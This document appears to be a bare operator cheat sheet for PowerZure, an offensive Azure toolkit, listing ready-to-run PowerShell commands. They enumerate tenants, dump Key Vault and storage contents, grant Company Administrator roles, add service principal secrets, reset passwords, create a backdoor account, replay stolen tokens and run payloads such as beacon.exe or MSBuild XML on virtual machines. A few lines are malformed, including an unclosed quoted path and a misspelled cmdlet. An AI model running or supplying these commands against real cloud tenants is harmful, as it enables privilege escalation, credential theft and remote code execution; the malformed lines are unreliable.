PowerZure

Connect:

Connect-AzAccount 
Get-AzureTarget

Enumeration:

https://powerzure.readthedocs.io/en/latest/Functions/infogathering.html

Auto Enumeration:

Get-AzureADApplication | tee AzureADApplication.txt
Get-AzureADAppOwner | tee AzureADAppOwner.txt
Get-AzureADDeviceOwner | tee AzureADDeviceOwner.txt
Get-AzureADRoleMember -Role 'Global Administrator' | tee AzureADRoleMember-GlobalAdmins.txt
Get-AzureADRoleMember -All | tee AzureADRoleMember-AllRoles.txt
Get-AzureADUser -All | tee AzureADUser-AllUsers.txt
Get-AzureInTuneScript | tee AzureInTuneScript.txt
Get-AzureLogicAppConnector | tee AzureLogicAppConnector.txt
Get-AzureManagedIdentity | tee AzureManagedIdentity.txt
Get-AzurePIMAssignment | tee AzurePIMAssignment.txt
Get-AzureRole -All | tee AzureRole-AllRoles.txt
Get-AzureRunAsAccount | tee AzureRunAsAccount.txt
Get-AzureSQLDB -All | tee AzureSQLDB-All.txt
Show-AzureKeyVaultContent -All | tee AzureKeyVaultContent.txt
Show-AzureStorageContent -All | tee AzureStorageContent.txt

Targeted Enumeration:

Get-AzureADGroupMember -Group '[Name of Group]' | tee AzureADGroupMember.txt
Get-AzureADUser -Username [Usename] | tee AzureADUser.txt
Get-AzureRole -Role [ROLE] | tee AzureRole.txt
Get-AzureRolePermission -Permission [role definition] | tee AzureRolePermission.txt
Get-AzureADRoleMember -Role 'Global Administrator' | tee AzureADRoleMember.txt
Show-AzureKeyVaultContent -Name [VaultName] | tee AzureKeyVaultContent.txt
Show-AzureStorageContent -Name [StorageName] | tee AzureStorageContent.txt

Exploit:

https://powerzure.readthedocs.io/en/latest/Functions/operational.html

Add-AzureADGroupMember  -User [UPN] -Group [Group name]

Add-AzureADRole -Username [User Principal Name] -Role '[Role name]'
Add-AzureADRole -UserId [UserId] -RoleId '[Role Id]'
Add-AzureADRole -Username test@test.com -Role 'Company Administrator'
Add-AzureADRole -UserId 6eca6b85-7a3d-4fcf-b8da-c15a4380d286 -Role '4dda258a-4568-4579-abeb-07709e34e307'

Add-AzureADSPSecret -ApplicationName [ApplicationName name] -verbose 

New-AzureADUser -Username [User Principal Name] 

Set-AzureElevatedPrivileges

Set-AzureADUserPassword -Username [UPN] -Password [new password]

New-AzureBackdoor -Username [Username] -Password [Password]

Connect-AzureJWT -Token [access token] -AccountId [Account's ID]

Export-AzureKeyVaultContent -VaultName [Vault Name] -Type [Key or Certificate] -Name [Name of Key or Cert] -OutFilePath  [Full path of where to export]
Get-AzureKeyVaultContent -VaultName [Name of vault]

Get-AzureRunAsCertificate  -AutomationAccount [AA Name]

Get-AzureRunbookContent -Runbook [Name of Runbook] -OutFilePath [Path of where to export runbooks]
Get-AzureRunbookContent -All -OutFilePath 'C:\temp
Start-AzureRunbook -Account [Automation Account name] -Runbook [Runbook name]

Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Command [command]
Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Script [Path to script]

Get-AzureStorageContent
Get-AzureStorageContent -StorageAccountName TestAcct -Type Container

Get-AzureVMDisk -DiskName [Name of Disk]

Invoke-AzureCommandRunbook -AutomationAccount [Automation Account name] -VMName [VM Name] -Script [Path to script]
Invoke-AzureCustomScriptExtension -VM 'Windows10' -ResourceGroup 'Defaultresourcegroup-cus' -Command 'powershell.exe -c mkdir C:\test'

Invoke-AzureRunCommand -VMName [VM Name] -Command [Command]
Invoke-AzureRunCommand -VMName AzureWin10 -Command whoami
Invoke-AzureRunCommand -VMName AzureWin10 -Script 'C:\temp\test.ps1'

Invoke-AzureRunMSBuild -VMName [Virtual Machine name] -File [C:/path/to/payload/onyourmachine.xml]
Invoke-AzVMRunCommand
Invoke-AzureRunMSBuildd -VMName AzureWin10 -File 'C:\temp\build.xml'

Invoke-AzureRunProgram  -VMName [Virtual Machine name] -File [C:/path/to/payload.exe]
Invoke-AzureRunProgram -VMName AzureWin10 -File C:\temp\beacon.exe

Invoke-AzureVMUserDataAgent -VM [Virtual Machine name]

Invoke-AzureVMUserDataCommand -VM [Virtual Machine name] -Command [command]

New-AzureIntuneScript -Script [path/to/script.ps1]